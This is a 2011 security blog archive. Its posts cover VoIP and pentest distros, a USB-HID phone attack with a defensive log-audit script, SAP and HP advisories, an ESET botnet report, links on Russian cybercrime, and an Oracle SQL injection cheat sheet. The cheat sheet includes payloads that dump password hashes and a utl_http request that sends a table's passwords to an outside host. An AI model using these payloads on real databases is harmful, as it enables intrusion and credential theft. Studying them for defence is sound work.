
Friday, January 21, 2011

VAST Live Distro beta 2.77

VAST is a VIPER Lab live distribution that contains VIPER-developed tools such as UCSniff, videojak, videosnarf and more. Along with the VIPER tools and other essential VoIP security tools, it also contains tools penetration testers rely on, such as Metasploit, Nmap and Hydra. This distribution is a work in progress; if you would like to see a tool or package included, please suggest it and I will do what I can to make it happen.

VAST also has a third-party repository for the VIPER tools built into the Synaptic package manager, so when a tool is updated, pulling the new version is as easy as apt-get.

VAST beta 2.74 has been released with UCSniff 3.0, which adds a GUI, real-time VoIP video monitoring, TFTP MitM modification of IP phone features, a bypass for Gratuitous ARP disablement, and support for several compression codecs. The new VAST also has a new look.


http://vipervast.sourceforge.net/

Thursday, January 20, 2011

Researchers turn USB cable into attack tool

Two researchers have figured out a way to attack laptops and smartphones through an innocent-looking USB cable.
Angelos Stavrou, an assistant professor of computer science at George Mason University, and student Zhaohui Wang wrote software that changes the functionality of the USB driver so that they could launch a surreptitious attack while someone is charging a smartphone or syncing data between a smartphone and a computer.
Basically, the exploit works by adding keyboard or mouse functionality to the connection so an attacker can then start typing commands or click the mouse in order to steal files, download additional malware, or do other things to take control of the computer, Stavrou told CNET in an interview. The exploit is enabled because the USB protocol can be used to connect any device to a computing platform without authentication, he said.
He and his partner were scheduled to demonstrate an attack at the Black Hat DC conference today.
The exploit software they wrote identifies what operating system is running on the device the USB cable is connected to. On Macintosh and Windows machines, a message pops up saying the system has detected a new human interface device, but there is no easily recognizable way to halt the process, Stavrou said. The Mac pop-up can be quickly removed by an attacker with a command sent via the smartphone so the laptop owner may not even see it, while the Windows pop-up lasts only one or two seconds in the lower left corner, making that an ineffective warning too, he said.
Linux machines offer no warning, so users will have no idea that something out of the ordinary is happening, particularly since the regular keyboard and mouse continue to function normally during an attack, Stavrou said.
"The operating system should present a pop-up and ask if the user really wants to connect the device" and specify what type of device is being identified to the system, he said.
The researchers wrote the exploit for Android devices only at this point. "It can be done for iPhone, but we didn't do it yet," Stavrou said. "It can work on any computing device that uses USB," and it can work between two smartphones by connecting a USB cable between them, he said.
"Say your computer at home is compromised and you compromise your Android phone by connecting them," he said. "Then, whenever you connect the smartphone to another laptop or computing device I can take over that computer also, and then compromise other computers off that Android. It's a viral type of compromise using the USB cable."
The original compromise can happen by downloading the exploit from the Web or running an app that is compromised. The researchers have created exploit software to run on a computer, and an exploit to run on Android that is a modification of the Android operating system kernel. Scripts can then be written for the actual attack.
Antivirus software wouldn't necessarily stop this because it can't tell that the activities of the exploit are not controlled or sanctioned by the user, Stavrou said. "It's hard to separate good behavior from bad behavior when it comes from the keyboard," he said.
There's not much a person can do to protect against this at this time, according to Stavrou. The operating systems should have the capability for devices to inspect USB traffic and alert users about what exactly is happening over the connection and give them the option of refusing an action, he said.
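The article's point for Linux is that nothing tells the user a new keyboard has appeared. The kernel does log it, though, and the tell-tale of the attack described above is a device that enumerates as something innocent (mass storage, as a phone does when syncing) and then also registers a HID keyboard or mouse. The script below is an added example, not the researchers' code, that reads kernel log lines (as printed by `dmesg` or `journalctl -k`) and flags that pattern. The log excerpt is constructed for the example; the vendor/product IDs and the "Nexus" name are placeholders.

```python
import re
from typing import Dict, List

# Constructed kernel-log excerpt (not a real capture). Port 1-1.2 carries a
# phone that first enumerates as USB mass storage (normal when syncing) and
# then also registers as a HID keyboard, the pattern described in the article.
# Port 1-1.3 is an ordinary keyboard for comparison.
SAMPLE_KERNEL_LOG = """\
[ 1234.567890] usb 1-1.2: new full-speed USB device number 5 using xhci_hcd
[ 1234.700000] usb 1-1.2: New USB device found, idVendor=18d1, idProduct=4ee2, bcdDevice= 2.23
[ 1234.700100] usb 1-1.2: Product: Nexus
[ 1234.750000] usb-storage 1-1.2:1.0: USB Mass Storage device detected
[ 1234.800000] input: Nexus as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.2/1-1.2:1.1/0003:18D1:4EE2.0003/input/input12
[ 1234.800200] hid-generic 0003:18D1:4EE2.0003: input,hidraw2: USB HID v1.11 Keyboard [Nexus] on usb-0000:00:14.0-1.2/input1
[ 1300.000000] usb 1-1.3: new low-speed USB device number 6 using xhci_hcd
[ 1300.100000] usb 1-1.3: New USB device found, idVendor=046d, idProduct=c31c, bcdDevice=64.00
[ 1300.100100] usb 1-1.3: Product: USB Keyboard
[ 1300.200000] hid-generic 0003:046D:C31C.0004: input,hidraw3: USB HID v1.10 Keyboard [USB Keyboard] on usb-0000:00:14.0-1.3/input0
"""

# "usb <bus>-<port path>: New USB device found, idVendor=xxxx, idProduct=xxxx"
NEW_DEVICE = re.compile(
    r"usb (?P<port>[\d.-]+): New USB device found, "
    r"idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})")
# "usb-storage <bus>-<port path>:<config>.<interface>: USB Mass Storage device detected"
MASS_STORAGE = re.compile(
    r"usb-storage (?P<port>[\d.-]+):\d+\.\d+: USB Mass Storage device detected")
# "hid-generic 0003:<VID>:<PID>.<n>: input,hidrawN: USB HID v1.11 Keyboard [name] on ..."
HID_INPUT = re.compile(
    r"hid-generic 0003:(?P<vid>[0-9A-Fa-f]{4}):(?P<pid>[0-9A-Fa-f]{4})\.\w+: .*?"
    r"USB HID v[\d.]+ (?P<kind>Keyboard|Mouse) \[(?P<name>[^\]]*)\]")


def audit_hid_attachments(log: str) -> List[Dict[str, object]]:
    """One record per HID keyboard/mouse that appeared in the log.

    A device that also enumerated a mass-storage interface on the same port is
    flagged: a phone or cable that is only charging or syncing has no business
    typing. Devices are correlated by vendor/product ID, which both the
    enumeration line and the hid-generic line carry.
    """
    by_port: Dict[str, Dict[str, object]] = {}
    findings: List[Dict[str, object]] = []
    for line in log.splitlines():
        if m := NEW_DEVICE.search(line):
            by_port[m["port"]] = {"vid": m["vid"], "pid": m["pid"], "storage": False}
        elif (m := MASS_STORAGE.search(line)) and m["port"] in by_port:
            by_port[m["port"]]["storage"] = True
        elif m := HID_INPUT.search(line):
            vid, pid = m["vid"].lower(), m["pid"].lower()
            dev = next((d for d in by_port.values()
                        if (d["vid"], d["pid"]) == (vid, pid)), None)
            composite = bool(dev and dev["storage"])
            findings.append({
                "vid": vid, "pid": pid, "kind": m["kind"], "name": m["name"],
                "also_mass_storage": composite,
                "verdict": ("SUSPICIOUS: storage device also registered as input"
                            if composite else "new input device, confirm it is expected"),
            })
    return findings


if __name__ == "__main__":
    # Live use:  dmesg | python3 hid_audit.py   or   journalctl -k | python3 hid_audit.py
    import sys
    text = SAMPLE_KERNEL_LOG if sys.stdin.isatty() else sys.stdin.read()
    for f in audit_hid_attachments(text):
        print(f"{f['vid']}:{f['pid']} {f['kind']:<8} [{f['name']}] -> {f['verdict']}")
```

The `hid-generic` line format is what current kernels print; older kernels name the driver `generic-usb`, so adjust the regex if you run this against an old host. A device that presents only as a keyboard (no storage) is not flagged here, because the log alone cannot distinguish it from a real keyboard; that case needs a udev rule or a USB authorization policy rather than detection after the fact.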


Read more: http://news.cnet.com/8301-27080_3-20028919-245.html


Wednesday, January 12, 2011

SAP Management Console Information Disclosure

It has been detected that many of the methods exposed by the sapstartsrv SOAP server do not require user authentication, allowing remote, unauthenticated users to obtain sensitive information from the SAP system, such as the list of log files and their content, profile parameters, developer traces, etc.

Furthermore, some of the unauthenticated methods perform security-sensitive operations that may impact the integrity, confidentiality and/or availability of the SAP system.

Technical details about this issue are not disclosed at this moment, to give affected customers enough time to patch their systems and protect against exploitation of the described vulnerability.

Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-002

HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code

Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code under the context of the user running the web server.

References: CVE-2011-0261 (ZDI-CAN-753)

Thanks: bugtraq@securityfocus.com

SAP Management Console Unauthenticated Service Restart

A Denial of Service vulnerability has been discovered in the processing of administration commands by the SAP MC. This functionality allows the service to be restarted without providing authentication information.

Technical details about this issue are not disclosed at this moment, to give affected customers enough time to patch their systems and protect against exploitation of the described vulnerability.

Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-001

Friday, January 7, 2011

Katana: Portable Multi-Boot Security Suite

Katana 2.0
Katana is a portable multi-boot security suite which brings together many of today's best security distributions and portable applications to run off a single flash drive. It includes distributions which focus on pen-testing, auditing, forensics, system recovery, network analysis, and malware removal. Katana also comes with over 100 portable Windows applications, such as Wireshark, Metasploit, Nmap, Cain & Abel, and many more.


http://www.hackfromacave.com/katana.html#katana_installation

Tuesday, January 4, 2011

ESET Threat Blog - New Botnet: Storm Signal?

New Botnet: Storm Signal?
BY DAVID HARLEY
December 31, 2010 at 12:55 pm
Pierre-Marc tells me that he has received two malware samples that grabbed his attention due to their resemblance to Storm/Waledac. They use the same kind of distribution mechanism: that is, spam with links to a New Year eCard, with titles like "New Year Wishes!" and "You Received an Ecard." The mail contains a link to a website that tells the victim he needs Flash to view the content.
The links seen so far redirect to a linked binary named to look like a Flash Player installation program (of course, it isn't).
The downloaded binaries are huge, weighing in at 475K packed.  The modus operandi strongly resembles Storm for the following reasons:
  • It uses fast flux
  • It presents itself as an eCard, the malicious binary passes itself off as Flash, and so on.
  • Many compiled libraries are associated with the binary
  • Infected hosts are used to extend the malware's proxy capabilities
  • It appears to be making use of a decentralized network protocol (p2p) based on HTTP: investigation continues.
  • The bot has spamming capabilities
ShadowServer has started talking about this publicly. For now, we're not seeing other sources mentioning it, but Pierre-Marc agrees with their assessment.
The samples seen so far are detected by nod32 as Agent.WSA (detection added December 29th), or Win32/Kryptik.JHS.
The botnet is still in the development phase, apparently: the gang is releasing quick updates and some of their servers are not responding, probably because they are unable to cope with the wave of new infections. This also closely resembles problems we saw during the early stages of the earlier botnets.
David Harley
Pierre-Marc Bureau

ORACLE SQL Injection Cheat Sheet

From http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/


Introduction

A quick and dirty ORACLE SQL injection cheat sheet, which will eventually be merged into the main SQL Injection Cheat Sheet. It should be enough to get you started with basic ORACLE SQL injection.

ORACLE SQL Injection Notes

In ORACLE you cannot just SELECT literals; every SELECT needs a FROM clause. For this purpose there is the special one-row table DUAL.
i.e. SELECT 'dummydata' || 'x' FROM DUAL;
You have to close comments if you use /* comment */ style comments.

Concatenation

SELECT 'x' || 'y' FROM DUAL;
SELECT 'a' || 'b' FROM DUAL;
SELECT user || '-' || password FROM members;
-- utl_raw.concat works on RAW values, so cast to RAW and back around it
SELECT utl_raw.cast_to_varchar2(utl_raw.concat(utl_raw.cast_to_raw('x'), utl_raw.cast_to_raw('y'))) FROM DUAL;

Comments

/* comment */
Note: you have to close these comments properly, otherwise you'll get a syntax error.

Line comment : --

Casting

For most data types, concatenating with a string casts automatically:
SELECT 1 || 'a' FROM DUAL;

Strings without quotes

SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(HEXTORAW('6e6f')) FROM DUAL; -- 6e 6f are the hex codes of 'n' and 'o'

Getting Stuff

Getting Tables

SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'

Getting Columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
(Table names are stored in upper case in the data dictionary, so match them that way.)

Getting Current Database Name

SELECT global_name FROM global_name

Getting Users and Passwords

SELECT name, password FROM sys.user$ where type#=1

Getting version

Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'

Getting Current User

SELECT user FROM dual

Simple Union Query

Simulating SQL Server's TOP feature

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;

Moving Records one by one

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;

Functions useful for Blind SQL Injection

  • BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
  • CHR() - Convert to Char
  • ASCII() - Convert to ASCII
  • SUBSTR() - Substring
  • BITAND() - Bit And operation
  • LOWER() - Convert to LowerCase

Doing outbound connections 

  • SELECT utl_http.request('http://www.example.com') FROM DUAL
  • SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members)) FROM DUAL
  • SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;
You can also confirm blind SQL injection via DNS lookups (often more reliable than HTTP when outbound traffic is egress-filtered) or via actual web requests.

References, Papers & Credits

Document History

  • 02/10/2007 - Public Release
  • 02/10/2007 - Getting passwords section and utl_http replaced with new and easier ones. Thanks to Alexander Kornbrust
  • 09/10/2007 - Sleep function added

Monday, January 3, 2011

Presentations and documents on Russian cybercrime, hacking and information warfare


Thanks to Niels Groeneveld 


http://www.linkedin.com/profile/view?id=1959881&authType=name&authToken=r4Y7&trk=mp_view_prf_t






[2000]

Russian View on Information War
http://fmso.leavenworth.army.mil/documents/Russianvuiw.htm

[2001]

Attitudes towards computer hacking in Russia
http://www.cs.kau.se/~stefan/IW/CC_4-5.pdf

Cyberwarfare: An Analysis of the Means and Motivations of Selected Nation States
http://www.ists.dartmouth.edu/docs/cyberwarfare.pdf

Inside Russia's Hacking Culture
http://www.wired.com/culture/lifestyle/news/2001/03/42346

Russian organized crime, Russian hacking, and US. security
http://www.cert.org/research/isw/isw2001/papers/Williams-06-09.pdf

[2002]

Russia and the Information Revolution
http://www.rand.org/pubs/issue_papers/2005/IP229.pdf

[2004]

Comparing US, Russian and Chinese IO Concepts
http://www.dodccrp.org/events/2004_CCRTS/CD/papers/064.pdf

Russian and Chinese Information Warfare: Theory and Practice
http://www.dodccrp.org/events/2004_CCRTS/CD/presentations/064.pdf

[2005]

Hacking in a Foreign Language: A Network Security Guide to Russia
http://web.archive.org/web/20050407230309/http://www.blackhat.com/presentations/bh-europe-05/bh-eu-05-geers-up.pdf

Russia: Organized Cybercrime
http://dc214.defcon.org/notes/june_2005/dc214_sn_orgcrime.ppt

Organized Crime and the Rule of Law in the Russian Federation
http://projects.essex.ac.uk/ehrr/V2N1/Orlova.pdf

[2006]

Access to Information in Russia
http://www.transparency.org.ru/doc/ACCESS_TO_INFORMATION_IN_RUSSIA_2006_01252_6.doc

[2007]

Cyber Attacks on Estonia - Short Synopsis
http://doubleshotsecurity.com/pdf/NANOG-eesti.pdf

Estonia vs. Russia - The DDOS War
http://www.cis.uab.edu/forensics/blog/Estonian.DDOS.pdf

Estonian Cyber Attacks 2007
http://meeting.afrinic.net/afrinic-11/slides/aaf/Estonia_cyber_attacks_2007_latest.pdf

Global Threat Research Report: Russia
http://www.verisign.com/static/042139.pdf

Lessons Learned from the Russian-Estonian Cyber-Conflict
http://lacnic.net/documentos/ixp/woodcock-caso_estonia.pdf

Russian Business Network Study
http://www.bizeul.org/files/RBN_study.pdf

Russian plans for development of Information Society
http://blog.icann.org/2007/10/russian-plans-for-development-of-information-society/

Tracking the Russian Business Network
http://www.cl.cam.ac.uk/research/security/seminars/archive/slides/2007-12-11.pdf

Webwar One: The Botnet Attack on Estonia
http://www.wired.com/images/press/pdf/webwarone.pdf

[2008]

An In-Depth Look at the Georgia-Russia Cyber Conflict of 2008
http://www.shadowserver.org/wiki/uploads/Shadowserver/BTF8_RU_GE_DDOS.pdf

Cyberattacks against Georgia: Legal Lessons Identified
http://www.carlisle.army.mil/DIME/documents/Georgia%201%200.pdf

Estonia: Information Warfare and Lessons Learned
http://ec.europa.eu/information_society/policy/nis/docs/largescaleattacksdocs/s5_gadi_evron.pdf

Political DDOS: Estonia and Beyond
http://www.usenix.org/events/sec08/tech/slides/nazario-slides.pdf

Propaganda, Information War and the Estonian-Russian Treaty Relations: Some Aspects of International Law
http://www.juridicainternational.eu/public/pdf/ji_2008_2_154.pdf

Russia: Economics, not Mafia fuel Malware
http://www.mcafee.com/us/local_content/reports/sage_russia_2008.pdf

Russia/Georgia Cyber War – Findings and Analysis
http://blog.refractal.org/wp-content/uploads/2008/10/2i7t2qyiwv0g63e7l3g.pdf

Russian Cyberwar on Georgia
http://georgiaupdate.gov.ge/doc/10006881/Microsoft%20Word%20-%20CYBERWAR%20short%20version_111008.pdf

The Information Revolution and Information Security Problems in Russia
http://www.au.af.mil/info-ops/iosphere/08special/iosphere_special08_tsygichko.pdf





http://www.linkedin.com/groupItem?view=&srchtype=discussedNews&gid=2708813&item=35360162&type=member&trk=EML_anet_ac_pst_ttle